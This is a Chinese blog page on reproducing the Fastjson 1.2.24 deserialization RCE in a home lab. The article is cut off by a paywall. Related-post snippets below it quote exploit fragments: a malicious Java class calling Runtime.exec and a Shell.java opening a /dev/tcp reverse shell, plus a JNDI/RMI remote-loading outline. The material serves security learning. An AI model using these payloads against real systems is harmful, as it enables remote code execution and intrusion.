Fastjson 漏洞复现1.2.24-rce

原创 已于 2024-08-26 09:28:29 修改 · 2k 阅读 · 42 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2024-08-22 15:32:25 首次发布

1.原理

fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞

2.实验准备

攻击机kali ip:192.168.3.183

靶机ubuntu ip:192.168.3.163

1.Bp抓包会用到的插件

​​​​​​Releases · Maskhe/FastjsonScan (github.com)

2.fastjson工具

我是直接下载到靶机里,这个工具跟log4j2用的工具是一样的,如果你看过我的log4j2文章,你可以直接把这个工具复制到fastjson文件里应用

git clone 

最低0.47元/天 解锁文章

200万优质内容无限畅学
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4716
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
网络安全--Fastjson1.2.24-RCE漏洞
weixin_46066254的博客
12-04 744
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,autoType标注了类对应的原始类型,方便在反序列化的时候定位到具体类型,fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。因为有了autoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。
fastjson 1.2.24 反序列化 RCE 漏洞复现
m0_63299551的博客
06-27 608
具体可以参考这篇文章FastJson的介绍与使用(一)_maven fastjson-CSDN博客fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中。
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 983
fastjson 1.2.24漏洞复现
fastJson1.2.24漏洞复现
@起风了的博客
05-06 824
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson-1.2.24漏洞复现
qq_43599126的博客
07-04 1700
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
Fastjson 反序列化漏洞[1.2.24-rce]
流水不争先,争的是滔滔不绝
05-28 796
漏洞影响版本【1.2.24之前】
fastjson1.2.24-RCE漏洞复现
three_1996的博客
03-15 2063
Fastjison在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链,造成远程代码执行。
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 522
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1573
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 1422
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
fastjson1.2.24 反序列化漏洞复现
RMC131的博客
07-21 1069
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。这里json与java对象之间的转换,便是使用的序列化和反序列化,fastjson的反序列化也就是来自这里。详细介绍:https://www.runoob.com/w3cnote/fastjson-intro.html。
fastjson 1.2.24反序列化漏洞复现
ATpiu的博客
03-21 3830
简介 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 环境 靶机:http://192...
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
qq_55202378的博客
05-11 1346
如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选记住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6865
fastjson1.2.24 RCE详细复现
漏洞复现fastjson_1.2.24_unserializer_rce
过期的秋刀鱼
11-04 436
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
Java安全-Fastjson漏洞
m0_63138919的博客
03-28 4378
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
kali的vulhub的fastjson/1.2.24-rce没有端口信息
最新发布
03-24
进入对应的 Vulhub 目录(例如 `/path/to/vulhub/fastjson/1.2.24-rce`),打开 `docker-compose.yml` 文件,查找是否存在未定义的服务端口号的情况。通常情况下,FastJSON漏洞利用需要监听特定端口来接收恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值